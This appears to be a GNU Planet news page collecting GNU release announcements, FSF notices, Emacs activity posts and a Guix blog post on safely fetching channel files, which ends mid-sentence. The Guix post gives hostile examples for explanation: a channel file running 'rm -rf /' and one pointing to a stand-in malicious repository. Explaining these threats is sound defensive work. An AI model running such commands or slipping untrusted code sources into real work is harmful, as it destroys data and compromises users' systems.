GNU Planet - Latest News

Did your pip install fail with longintrepr.h: No such file or directory? The file likely is on your system, but it sometime or another it was moved, from /usr/include/python3.xx/longintrepr.h to /usr/include/python3.xx/cpython/longintrepr.h. The proper fix is to update the package in question with the new path, but if you’re installing an old version of something or a package that’s no longer maintained you can work around it like this: ln -s /usr/include/python3.*/cpython/longintrepr.h .venv/include

This is to announce CSSC-1.5.0-rc3, a beta release. This is a release candidate for a future stable 1.5.0 release. There have been 46 commits by 2 people in the 109 weeks since CSSC-1.5.0-rc2. See the NEWS below for a brief summary. Thanks to everyone who has contributed! The following people contributed changes to this release:   Greg A. Woods (1)   Paul Bryce (2)   James Youngman (43) James ================================================================== Here is the GNU CSSC home page:     https://gn ... rg/s/CSSC/ Here are the compressed sources and a GPG detached signature:   https://alpha.gnu ... -1.5.0-rc3.tar.gz   https://alpha.gnu ... .0-rc3.tar.gz.sig Use a mirror for higher download bandwidth:   https://www.gnu.o ... rg/order/ftp.html Here are the SHA256 and SHA3-256 checksums:   File: CSSC-1.5.0-rc3.tar.gz   SHA256 sum:   a78bc23062b11c33a858acd8a08c173ea2957f763f5b7ddb2990c0fee7c71cec   SHA3-256 sum: 20733dd3c517c1bb44c67088b1a208ebf00e1eab4ab21e806bd963869faf918a Verify the SHA256 checksum with either sha256sum, sha256, or 'shasum -a 256'. Verify the SHA3-256 checksum with 'cksum -a sha3 -l 256 --base64' from coreutils-9.8. Use a .sig file to verify that the corresponding file (without the .sig suffix) is intact.  First, be sure to download both the .sig file and the corresponding tarball.  Then, run a command like this:   gpg --verify CSSC-1.5.0-rc3.tar.gz.sig The signature should match the fingerprint of the following key:   pub   rsa4096 2015-12-24 [SC]         0CF4 E8D8 7159 3224 8428  32B8 88DD 9E08 C5DD ACB9   uid   James Youngman <james@youngman.org>   uid   James Youngman <jay@gnu.org> If that command fails because you don't have the required public key, or that public key has expired, try the following commands to retrieve or refresh it, and then rerun the 'gpg --verify' command.   gpg --locate-external-key james@youngman.org   gpg --recv-keys 88DD9E08C5DDACB9   wget -q -O- 'https://savannah. ... SC&download=1' | gpg --import - As a last resort to find the key, you can try the official GNU keyring:   wget -q https://ftp.gnu.o ... u/gnu-keyring.gpg   gpg --keyring gnu-keyring.gpg --verify CSSC-1.5.0-rc3.tar.gz.sig This release is based on the CSSC git repository, available as   git clone https://https.git ... .org/git/CSSC.git with commit 26add75e45f79cd493409ee2f0c2646849314aad tagged as v1.5.0-rc3. For a summary of changes and contributors, see:   https://gitweb.gi ... tlog;h=v1.5.0-rc3 or run this command from a git-cloned CSSC directory:   git shortlog 43b5b054701732df7ce24eb59821010c39c60cb6..v1.5.0-rc3 This release was bootstrapped with the following tools:   Autoconf 2.72   Automake 1.17   Gnulib 2026-06-08 88592a2880cf39a2f597cd0294a90d8dd7faa2df NEWS Noteworthy changes in release 1.5.0-rc3 (2026-06-14)         * Some typos in error message have been fixed.         * admin now supports combination of -r with -n as well as the           portable combination of -r with -i.         * Support "sccs sact"; the sact program already existed but   could not previously be invoked via the sccs wrapper.   Thanks to Greg A. Woods for this improvement.         * In some places we now prefer "grep -E" to "egrep" in order           to avoid a warning message from GNU grep.  Some very old           versions of Unix may not support this option.         * Various C++ portability improvements. Updated version of gnulib. Updated version of googletest; this is now at the last           version at which it still supported building with Automake.

September 19, 2026 from 14:30–17:30 CET

Join the FSF and friends on Friday, June 19 from 12:00 to 15:00 EDT (16:00 to 19:00 UTC) to help improve the Free Software Directory.

Join the FSF and friends on Friday, June 12 from 12:00 to 15:00 EDT (16:00 to 19:00 UTC) to help improve the Free Software Directory.

GNUtrition 0.33 is now released. This marks the first release of GNUtrition since 2012, approximately 14 years ago! GNUtrition is free nutrition analysis software. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information. This release is a complete rewrite of GNUtrition in C rather than Python 2 with a new GTK 3 interface replacing the old GTK 2 one. The Nutrient Database of Standard Reference, which stopped getting updated in 2018, was replaced with the USDA Food and Nutrition Database for Dietary Studies. With help from some test volunteers, the build and installation process was better streamlined to resolve critical issues and difficulties so that GNUtrition can be a better program overall. Considering the time between releases, GNUtrition currently is not available on OS package repositories (as far as I am aware). If you package software for your operating system's package manager, it would be very helpful if you could start packaging GNUtrition so that it may be even more easily used by people on said systems. If you don't, you may still request to those who do to start including GNUtrition. Thank you to everyone who tested/used GNUtrition 0.33's release candidates and provided meaningful feedback on its functionality, design, and so on. I would also like to especially thank Jason Self for providing us with the C rewrite in the first place. More information about GNUtrition may be found on its home page at http://gnu.org/so ... tware/gnutrition/. This release can be obtained from the ftp.gnu.org server at one of the following: ftp://ftp.gnu.o ... gnu/gnutrition/ http://ftp.gnu.or ... g/gnu/gnutrition/ https://ftp.gnu.o ... g/gnu/gnutrition/ The FTP mirror list is available at https://gnu.or ... order/ftp.html, and https://ftpmirror ... u.org/gnutrition/ will automatically redirect you to a nearby mirror. Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition). Happy hacking and calorie counting!!

Version 5.5 of GNU direvent is available for downloads. New in this version: All subprocesses are terminated before exit New configuration statement: shutdown-timeout See the NEWS file for more details.

Libtoolers! The Libtool Team is pleased to announce the release of libtool 2.6.1, a beta release. GNU Libtool hides the complexity of using shared libraries behind a consistent, portable interface. GNU Libtool ships with GNU libltdl, which hides the complexity of loading dynamic runtime libraries (modules) behind a consistent, portable interface. There have been 34 commits by 14 people in the 37 weeks since 2.6.0. See the NEWS below for a brief summary. Thanks to everyone who has contributed! The following people contributed changes to this release:   Alexandre Janniaux (4)   Alexey Samsonov (1)   Anthony Mallet (1)   Arnold (1)   Dima Pasechnik (1)   Frederic Berat (1)   Ileana Dumitrescu (15)   KO Myung-Hun (4)   Kirill Makurin (1)   Mintsuki (1)   Nicolas Boulenguez (1)   Olly Betts (1)   Patrice Dumas (1)   Richard J. Mathar (1) Ileana  [on behalf of the libtool maintainers] ================================================================== Here is the GNU libtool home page:     https://gnu. ... g/s/libtool/ Here are the compressed sources:   https://alpha.gnu ... tool-2.6.1.tar.gz   (2.1MB)   https://alpha.gnu ... tool-2.6.1.tar.xz   (1.1MB) Here are the GPG detached signatures:   https://alpha.gnu ... -2.6.1.tar.gz.sig   https://alpha.gnu ... -2.6.1.tar.xz.sig Use a mirror for higher download bandwidth:   https://www.gnu.o ... rg/order/ftp.html Here are the SHA256 and SHA3-256 checksums:   File: libtool-2.6.1.tar.gz   SHA256 sum:   52264ab2fca9464dea9f6a0355d39e49b18f40468b9b6dbc3d151a0dba307a4b   SHA3-256 sum: 59826fb74043179c38a393448b92dfcdfbe9046fd3b23a7079665984f22d6688   File: libtool-2.6.1.tar.xz   SHA256 sum:   3fb21f1e99fcdd8565c9b00fb1371db457b82a0da7cba273e1617c954b0ad1ee   SHA3-256 sum: 614bc3ed43293be989ec3305dae42fc4e81234429477490734a40f6d3316560b Verify the SHA256 checksum with either sha256sum, sha256, or 'shasum -a 256'. Verify the SHA3-256 checksum with 'cksum -a sha3 -l 256 --base64' from coreutils-9.8. Use a .sig file to verify that the corresponding file (without the .sig suffix) is intact.  First, be sure to download both the .sig file and the corresponding tarball.  Then, run a command like this:   gpg --verify libtool-2.6.1.tar.gz.sig The signature should match the fingerprint of the following key:   pub   rsa4096 2021-09-23 [SC]         FA26 CA78 4BE1 8892 7F22  B99F 6570 EA01 146F 7354   uid   Ileana Dumitrescu <ileanadumitrescu95@gmail.com>   uid   Ileana Dumitrescu <ileanadumi95@protonmail.com> If that command fails because you don't have the required public key, or that public key has expired, try the following commands to retrieve or refresh it, and then rerun the 'gpg --verify' command.   gpg --locate-external-key ileanadumitrescu95@gmail.com   gpg --recv-keys 6570EA01146F7354   wget -q -O- 'https://savannah. ... ol&download=1' | gpg --import - As a last resort to find the key, you can try the official GNU keyring:   wget -q https://ftp.gnu.o ... u/gnu-keyring.gpg   gpg --keyring gnu-keyring.gpg --verify libtool-2.6.1.tar.gz.sig This release is based on the libtool git repository, available as   git clone https://https.git ... g/git/libtool.git with commit 79de7bb71bc0a1167f4c4ae8bd897976a0ff2b51 tagged as v2.6.1. For a summary of changes and contributors, see:   https://gitweb.gi ... shortlog;h=v2.6.1 or run this command from a git-cloned libtool directory:   git shortlog v2.6.0..v2.6.1 This release was bootstrapped with the following tools:   Autoconf 2.73   Automake 1.18.1   Gnulib 2026-05-12 722f67e9716bf914c18d468336c1f4f9e5cce915 NEWS Noteworthy changes in release 2.6.1 (2026-06-04) [beta] ** New features:   - Pass 'resource-dir=*' flag for Clang.   - Recognise explicit shared library arguments when linking dependency     libraries to a shared library, like exists when linking a program.   - Support OpenMP with macOS clang by processing '-Xpreprocessor     -fopenmp' as one token. ** Bug fixes:   - Store cygpath file path conversions correctly for MSYS2 and MSVC.   - Fix syntax error in LT_PROG_OBJC and LT_PROG_OBJCXX.   - Separate Objective C and C++ cache check for proper tagging support.   - Fix in darwin to support values with spaces.   - Limit the length of DLL name to 8.3 correctly to avoid corrupting a     generated DLL on OS/2.   - Remove unused variable on OS/2, which could cause issues with static     library generation if defined.   - Recognise more static linking options for Clang.   - Fix emscripten CXX postdeps using non-PIC sysroot.   - Avoid deprecated option '-o' with MSVC compilers and replace with '-Fe'.   - Avoid overlinking of dependency libraries on ELF systems.   - Ensure old libraries are not archived. ** Changes in supported systems or compilers:   - Add support for SlimCC compiler.   - Add support for *-ironclad-gnu. Enjoy!

A test release of GNUtrition, 0.33.0rc5, is now available. GNUtrition is free nutrition analysis software. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information. This release fixes bugs from 0.33.0rc1-rc4, removes inaccurate algorithm constants, removes additional unnecessary dependencies, improves reliability/usability on non-GNU systems, among other general improvements and bug fixes. Version 0.33.0 (the first ftp.gnu.org release of GNUtrition since 2012) is expected to be released by June 5th. Any and all testing for the upcoming release will be greatly appreciated. Please use the bug-gnutrition and help-gnutrition mailing lists for your bug reports and/or other questions. More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:     ftp://alpha.gnu.o ... g/gnu/gnutrition/     http://alpha.gnu. ... g/gnu/gnutrition/     https://alpha.gnu ... g/gnu/gnutrition/ Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).

Check out the important work our volunteers accomplished this week and at today's Free Software Directory (FSD) IRC meeting.

o Support new "altbridging" workaround in ipmi-sensors. o Fix exploitable buffer overflows in the following ipmi-oem   commands:   - ipmi-oem dell get-active-directory-config   - ipmi-oem fujitsu get-sel-entry-long-text https://ftp.gnu.o ... pmi-1.6.18.tar.gz

Join the FSF and friends on Friday, June 5 from 12:00 to 15:00 EDT (16:00 to 19:00 UTC) to help improve the Free Software Directory.

Hello and welcome to my May 2026 free software activities report. A lot's been going on in my life offline so I took a bit of a hiatus from doing these reports, but I've had a fairly productive month of May so I thought it'd be nice to do another one for this month. GNU & FSF GNU Emacs: ffs-0.2.2: I finally polished and published my ffs package for GNU Emacs on GNU ELPA. Many thanks to Protesilaos for rounds of code review and feedback for improving and polishing the package in preparation for submission to GNU ELPA. bug#81101: Trying to visit https://www.emacswiki.org in EWW I noticed it fails with a Somebody wants you to give them money error due to the anti-bot challenge being served with a HTTP 402 (Payment Required) response. So I landed a patch 12eec781ed6 to no longer do that. Thanks to Emacs comaintainer Sean Whitton for reviewing and approving my proposed patch. bug#81107: I noticed that in EWW, unlike <input type="submit"> HTML buttons, <button> elements were not tab-stoppable, leading to poorer usability and accessibility. So I landed a patch ec3d662de0b to fix that. Thanks to Emacs comaintainer Eli Zaretskii for reviewing, providing feedback, and accepting my proposed change. Emacs Chat with Sacha Chua: I joined Sacha for a new episode of her Emacs Chat podcast, where we talked about Emacs and life. I gave a quick tour of my Emacs configuration, discussing at length my configurations for EXWM (Emacs X Window Manager) among other topics like Emacs's facility for visually indicating buffer boundaries in the fringe by setting indicate-buffer-boundaries and my convenience configuration macros. maintainers@: I started the next long-overdue round of emails to GNU package maintainers to confirm the contact information we have on file for them and get a brief status update about their packages. Emails are sent in small batches to keep the workload of handling the responses manageable for assistant GNUisances. GNU Spotlight: I prepared and sent the May GNU Spotlight to the FSF campaigns team for publication on the FSF's community blog and the monthly Free Software Supporter newsletter. Debian I've begun the work toward updating the Jami package in Debian unstable again, which means I need to package new releases of its direct and indirect dependencies. For OpenDHT, I need to update RESTinio, and to do that I first need to package expected-lite and sobjectizer for Debian: #1120837: ITP: expected-lite – expected objects for C++11 and later #1137609: ITP: sobjectizer – C++ implementation of Actor, Publish-Subscribe, and CSP models I've been working on packaging both and hope to have them uploaded to the archive in the next days and weeks. That's it for this month's report. Take care, and so long for now.

A test release of GNUtrition, 0.33.0rc4, is now available. GNUtrition is free nutrition analysis software. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information. This release improves how user ages are stored and used by GNUtrition. You no longer need to manually update your age every year on (or near) your birthday. Thankfully, no database changes/migrations are necessary for this, you just need to enter your birthday and you will be good to go! More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:     ftp://alpha.gnu.o ... g/gnu/gnutrition/     http://alpha.gnu. ... g/gnu/gnutrition/     https://alpha.gnu ... g/gnu/gnutrition/ Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).

A test release of GNUtrition, 0.33.0rc3, is now available. GNUtrition is free nutrition analysis software written for the GNU operating system. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information. This release removes a number of dependencies that broke building/installing on various systems. You no longer need to have a full LibreOffice, ncurses, SQLite, or LaTeX/TexInfo install to build and install GNUtrition. More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:     ftp://alpha.gnu.o ... g/gnu/gnutrition/     http://alpha.gnu. ... g/gnu/gnutrition/     https://alpha.gnu ... g/gnu/gnutrition/ Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).

GNU Parallel 20260522 ('Hantavirus') has been released. It is available for download at: lbry://@GnuParallel:4 Quote of the month:   ...and GNU Parallel is fun.     -- DJviolin@reddit New in this release: --fast rewritten. 1 million jobs in 10 seconds. Try: seq 1000000 | time parallel --fast echo | wc -l Bug fixes and man page updates. GNU Parallel - For people who live life in the parallel lane. If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it. About GNU Parallel GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel. If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops. GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs. For example you can run this to convert all jpeg files into png and gif files and have a progress bar:   parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:   find . -name '*.jpg' |     parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200 You can find more about GNU Parallel at: http://www.gnu ... rg/s/parallel/ You can install GNU Parallel in just 10 seconds with:     $ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \        fetch -o - http://pi.dk/3 ) > install.sh     $ sha1sum install.sh | grep c555f616391c6f7c28bf938044f4ec50     12345678 c555f616 391c6f7c 28bf9380 44f4ec50     $ md5sum install.sh | grep 707275363428aa9e9a136b9a7296dfe4     70727536 3428aa9e 9a136b9a 7296dfe4     $ sha512sum install.sh | grep b24bfe249695e0236f6bc7de85828fe1f08f4259     83320d89 f56698ec 77454856 895edc3e aa16feab 2757966e 5092ef2d 661b8b45     b24bfe24 9695e023 6f6bc7de 85828fe1 f08f4259 6ce5480a 5e1571b2 8b722f21     $ bash install.sh Watch the intro video on http://www.youtub ... L284C9FF2488BC6D1 Walk through the tutorial (man parallel_tutorial). Your command line will love you for it. When using programs that use GNU Parallel to process data for publication please cite: O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/1 ... 81/zenodo.1146014. If you like GNU Parallel: Give a demo at your local user group/team/colleagues Post the intro videos on Reddit/Diaspora*/forums/blogs/ Identi.ca/Google+/Twitter/Facebook/Linkedin/mailing lists Get the merchandise https://gnuparall ... igns/gnu-parallel Request or write a review for your favourite blog or magazine Request or build a package for your favourite distribution (if it is not already there) Invite me for your next conference If you use programs that use GNU Parallel for research: Please cite GNU Parallel in you publications (use --citation) If GNU Parallel saves you money: (Have your company) donate to FSF https://my.f ... .org/donate/ About GNU SQL GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries. The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell. When using GNU SQL for a publication please cite: O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32. About GNU Niceload GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.

In the recent weeks I've been engaging Prot as a coach to help review my new ffs package for GNU Emacs as I worked on preparing it for inclusion in GNU ELPA, as well as discussing other Emacs- and life-related topics. UPDATE 2026-05-23 22:39:15 -0400: Prot also published an article about our session on his website: https://protesilaos.com/commentary/2026-05-23-life-issues-and-philosophy-amin-bandali/ In our nearly 2-hour conversation, we discussed at length and in depth various aspects of life in the current times. For instance, feeling overwhelmed in the face of innumerable things happening at once, with technology changing our perception and making events feel proximate and imminent. We talked about seasonality and rhythms in life, including in relation to burnout and knowing our own limitations, and descriptive vs prescriptive thinking when reflecting on the expectations we may place on our self when comparing our self to others through the lens of our necessarily-incomplete impressions and glimpses of their lives. We discussed absence or loss as a dual to presence or persistence in the process of life. How with our memories and through embodying the philosophy and teachings of departed loved ones their essence and legacy continues to live on within us. But also loss in the sense of us losing parts of our self in life-defining moments while preserving other parts and gaining new ones, being liberated of some of the burdens of our past self and in effect becoming someone else in the process. In being true to our self, we talked about humans as multi-faceted beings and the importance of expressing and giving a voice to these different aspects of our self, and keeping alive that child-like sense of awe and wonder. To live a life where the pace and rhythms of our environment are in sync with our internal rhythms, and to not give others undue power over us or our happiness through trying to live according to their prescribed standards or expectations. I also learned more about Prot's practical philosophy of situational awareness in life, not merely as a means for survival, but also as a way of appreciating all of the beauty that surrounds us, and a method for gaining the knowledge and skills to apply what we learn from patterns in one area of life to other areas. We concluded our session with a mention to the concept of sanctity, to set aside a sacred time or place for our self wherein no distractions are allowed, where we can unwind, rest, and recharge for whatever comes next. Here is the video recording of our session, which I share with Prot's permission: Sorry, this embedded video will not work, because your web browser does not support HTML5 video. [ please watch the video in your favourite streaming media player ]​ You can view or download the full-resolution video from the Internet Archive. Like Prot, I am invigorated and inspired to live a full, honest life. To do my best, do what I do in earnest, and make the best of what I have. Take care, and so long for now.

BOSTON, Massachusetts, USA (Tuesday, May 19, 2026) — The Free Software Foundation (FSF) reports that its global call for free software supporters to organize LibreLocals this May resulted in free software supporters organizing forty-six LibreLocal events on six continents thus far. New dates and locations are being added daily.

ffs provides a minor mode for simple plain text presentations in Emacs, where the slides are separated using the page-delimiter, by default the form feed character (^L). I wrote ffs in early 2022 for my LibrePlanet 2022 presentation the Net beyond the Web, and earlier this year decided to polish it towards being a proper package and submit it to GNU ELPA. The manual still needs some more work, but the overall package is in pretty good shape so I submitted for inclusion in GNU ELPA. Package name (GNU ELPA): ffs Official manual: https://kelar.org/~bandali/gnu/emacs/ffs.html Change log: https://kelar.org/~bandali/gnu/emacs/ffs-changelog.html Git repository: https://git.kelar.org/~bandali/ffs Backronyms: fabulous foolproof slides - for freedom's sake - ffs flips slides ffs and I owe a debt of gratitude to Protesilaos for rounds of code review and feedback for improving and polishing the package in preparation for submission to GNU ELPA. You can watch videos of these sessions posted earlier on my website: FFS code review with Protesilaos FFS code review and Emacs extensibility with Protesilaos Further, inspiration for parts of ffs's implementation was gratefully drawn from Protesilaos's Logos package for Emacs. Dedicated to the loving memory of Farangis Yousefinia. Below are the release notes. Version 0.2.2 on 2026-05-21 First release of ffs on GNU ELPA. The attempted build of ffs 0.2.1 within GNU ELPA build sandbox failed with an Error: void-function (org-texinfo-kbd-macro) due to use of #+macro: kbd (eval (org-texinfo-kbd-macro $1)) in ffs.org for better formatting of key sequences in the exported Texinfo copy. This seems to have happened for the specific case of generating a plain text README using ox-ascii where ELPA didn't load ox-texinfo. To try and mitigate this, a README.md has been added for use as the package README instead of ffs.org. If not sufficient, a Texinfo copy of the ffs manual will be shipped instead of the Org one in the next release. ffs 0.2.2 also includes small fixes and improvements throughout ffs.el from Stefan Monnier, and additional feedback to be addressed in future releases. Version 0.2.1 on 2026-05-20 The attempted build of ffs 0.2.0 within GNU ELPA build sandbox failed with a "Cannot include file" error on the "#+include: fdl.org" in the manual. So, as a workaround, we switch to using the official Texinfo copy of the GNU FDL license rather than an Org copy. Version 0.2.0 on 2026-05-19 First release of ffs intended for GNU ELPA. After a few years of inactivity, in early 2026 I decided to dust off ffs.el, polish and document it, and offer for inclusion in GNU ELPA as a proper package. Default value of ffs-default-face-height changed to nil To minimize unexpected and/or unnecessary changes out-of-the-box, the default value of ffs-default-face-height has been changed to nil. ffs-edit-buffer-name demoted from user option to variable This is not an important user-facing setting, so to help avoid overwhelming users with many options, this has been demoted from a user option to a variable. Several new user options for customizing ffs's behaviour As part of the effort to bring ffs more in line with the conventions of other existing Emacs packages, the mechanisms for toggling various parts of Emacs's interface to minimize visual clutter were changed from being minor modes to being customizable user options. These are the replacement new user options, with a default value of nil: ffs-hide-cursor ffs-hide-mode-line ffs-hide-header-line Their value is buffer-local, and may be set globally using setq-default. See the sample configuration in the manual for an example of how to customize them. The new ffs-page-delimiter user option defines the page delimiter inserted by ffs-edit-done when inserting a new slide. Emacs's page-delimiter regexp should be able to match ffs-page-delimiter's value, so if you use a custom page-delimiter be sure to customize ffs-page-delimiter accordingly. The new ffs-echo-progress user option controls whether to display in echo area the progress through the slides. When non-nil, changing slides will also display the progress through the slides in the echo area. The format of the displayed progress can be customized using the new ffs-echo-progress-format user option. The new ffs-edit-display-buffer-alist user option may be used to control the Window configuration for the ffs-edit buffer. By default, it will display the ffs-edit buffer in the same window. The new ffs-edit-done-hook user option may be used to define hooks to be run at the end of ffs-edit-done after returning to the main ffs presentation buffer. Lastly, a new ffs-find-speaker-notes-function variable was added to allow customizing the find function used for opening the speaker's notes file, defaulting to find-file-other-frame. Version 0.1.0 on 2022-05-19 Initial publication of ffs.el as part of my personal configurations for GNU Emacs. My first attempt at this concept was a now-archived ffsanim.el, a major mode implementation that used Emacs's animate library to animate slide texts onto the screen. Shortly after realizing the shortcomings of that approach, I abandoned it in favour a minor mode implementation and published version 0.1.0 of what is now ffs in my personal configs repository. I used this implementation for presenting my LibrePlanet 2022 talk, The Net beyond the Web. I picked "ffs" as the package name, the acronym for form feed slides.

A new GNU Taler integration is now officially available: be-BOP.

Files by age, newest first: ls -lt Docker images by age, newest first: docker images --format "{{.CreatedAt}}\t{{.Repository}}:{{.Tag}}" | sort -r Files by size, largest first: ls -lS Docker images by size, largest first: docker images --format "{{.Size}}\t{{.Repository}}:{{.Tag}}" | sort -rh Why why why??!

In the recent weeks I've been engaging Prot as an Emacs coach to help with doing review passes over my upcoming ffs package as I work on polishing and documenting it in preparation for offering it for inclusion in GNU ELPA. UPDATE 2026-05-15 08:50:10 -0400: Prot also published an article about our session on his website: https://protesilaos.com/codelog/2026-05-15-emacs-amin-bandali-ffs-display-buffer-org-capture/ Today we had our third session where we started by reviewing and talking about my recent changes to ffs, then ventured to other Emacs-related topics with the overarching theme of the flexibility and extensibility of GNU Emacs, including display-buffer-alist, keyboard macros, defining a custom ox-bhtml Org export backend derived from Org's ox-html for ultimate flexibility when exporting my site's pages from Org to HTML, Org capture, plain text files and Emacs's diary and how it compares to org-agenda, and keeping a journal with the help of Emacs. Here is the video recording of our session, which I share with Prot's permission: Sorry, this embedded video will not work, because your web browser does not support HTML5 video. [ please watch the video in your favourite streaming media player ]​ You can view or download the full-resolution video from the Internet Archive. Lastly, here is the snippet Prot shared for having Isearch treat space as a wildcard, helpful for more easily matching multiple parts of a line: (setq search-whitespace-regexp ".*?") (setq isearch-lax-whitespace t) (setq isearch-regexp-lax-whitespace nil) Take care, and so long for now.

A test release of GNUtrition, 0.33.0rc2, is now available. GNUtrition is free nutrition analysis software written for the GNU operating system. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information. This release makes some fixes to the gender option.  It also applies a fix to ./version.sh that affected builds from CVS checkouts, which was not an issue with the tarball, due to the tarballs including the version in a .ver file. More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/.  This test release can be obtained from the alpha.gnu.org server at one of the following: ftp://alpha.gnu.o ... g/gnu/gnutrition/ http://alpha.gnu. ... g/gnu/gnutrition/ https://alpha.gnu ... g/gnu/gnutrition/ Please report any problems you experience to the GNUtrition bug reports mailing list: <bug-gnutrition@gnu.org> (https://lists.gnu ... fo/bug-gnutrition).

When offered the option to run other people’s code, a prime consideration is often ease of deployment. While much progress has been made in support of rapid deployment, the security implications of those quick deployments is often overlooked. In this post, we look at a new feature of guix time-machine and guix pull in support of one-line deployment commands: the ability to download channel files, but without compromising on security.Sharing codeThe normal workflow to share software and make it easily deployable with Guix goes like this: someone puts their packager hat on and writes a package definition, adds it to Guix proper or to a separate channel, at which point anyone can fetch the relevant channel(s) and deploy the software.As an example, let’s assume you want to run yt-dlp as packaged in the latest Guix revision without upgrading your system or going through an explicit installation step. The simplest way to do that is with this command:guix time-machine -q -- shell yt-dlp -- yt-dlp …If you’re familiar with Nix, this is equivalent—with some important differences we’ll discuss below—to this command:nix shell nixpkgs#yt-dlp --command yt-dlp …In both cases, we’re fetching the latest revision of the package collection (the master branch for Guix, the nixpkgs-unstable branch of Nixpkgs for Nix) and running yt-dlp from there. (nix run goes one step further by removing the need to specify the command name.)Now, that was an easy example because yt-dlp comes from Guix itself. What if you’d like to deploy an application that’s in another channel such as Guix-Science? Well, you would first need to come up with a channels.scm file for Guix-Science and then you can pass it to guix pull or guix time-machine:$EDITOR channels.scm # Make sure that includes Guix-Science. guix time-machine -C channels.scm -- shell …If you’re lucky, perhaps you can download a channel file. For example, Cuirass produces them for all successfully-evaluated commits, so you can fetch one for Guix-Science and go from there:wget -O channels.scm \ https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science guix time-machine -C channels.scm -- shell …You can even do it in a single command using Bash process substitution!guix time-machine \ -C <(wget -O https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science) \ -- shell …Is it a good idea though?The threatIf you look more closely, the nix shell command and the last two guix time-machine commands have a bit of a curl | sh flavor to it: downloading arbitrary code and running it without further ado. All nix shell does is authenticate github.com, through HTTPS, and likewise for wget—that you’re downloading from the genuine github.com doesn’t tell you anything about the trustworthiness of the code you’re running.In the case of Guix, the channels.scm you’re downloading could very well read this:(system* "rm" "-rf" "/") ;uh-oh!Here system*, as you might have guessed, invokes a command. Because yes, channel files can contain arbitrary Scheme code! (It’s worth noting that this particular problem is one Nix doesn’t have: Nix being a domain-specific language (DSL) already limits what Nix code can do, especially with so-called “pure� evaluation.)Or it could read something like this:(list (channel (name 'guix) ;; This is Mallory’s malicious Guix, now you’re PWND! (url "https://example.org/EVIL/guix.git") (branch "master") (introduction (make-channel-introduction "badc0ffeed807b096b48283debdcddccfea34bad" (openpgp-fingerprint "DEAD CABB A99E F6A8 0D1D E643 A2A0 6DF2 A33A BADD")))))In this case, the channel file looks good, but the channel you’ll fetch—probably not so much.So no: downloading a channel file and using it without checking it is not reasonable.The cakeCan we have our cake and eat it too? Can we casually download someone else’s channel file without putting our system at risk?Changes that have just landed in guix pull and guix time-machine aim to address these seemingly contradictory needs. The two commands are now equipped to download by themselves: just pass them a URL with the -C (or --channels) option.guix time-machine \ -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master \ -- …Crucially, this command is not equivalent to the naïve -C <(wget -O …) trick we saw above.First, channel code is now evaluated in a “sandbox�: it can only access a predefined set of bindings, cannot import additional modules, and it must run in a limited amount of time and with a limited amount of memory allocated. This still provides access to many general-purpose facilities but blocks anything that could be used to alter the system state, exfiltrate data, or cause a denial of service.With this in place, evaluating a channel file can be considered safe. Now, one problem remains: the file might list channels that I as a user do not trust. And here we see a tension between fetching channel files from out there and keeping one’s system safe. To address that, we define a new rule: only trusted channels may be deployed; if a channel file lists untrusted channels, guix pull and guix time-machine error out. Trusted channels are defined as follows:they are those listed in ~/.config/guix/trusted-channels.scm, if it exists—this file lists channels just like a regular channel file;or, they are the channels currently in use, as returned by guix describe.This brings us to the interesting question of channel identity. This channel I call guix-science in my trusted-channels.scm, someone else might as well call it Guix-Science or science; how can I tell if we’re dealing with the channel that I call guix-science and that I trust?The key insight is that the name itself doesn’t matter; the element that does matter is the “introduction� of the channel—the piece of information that tells how to authenticate updates of that channel. If you forgot that episode, the introduction the thing with hexadecimal strings that appears 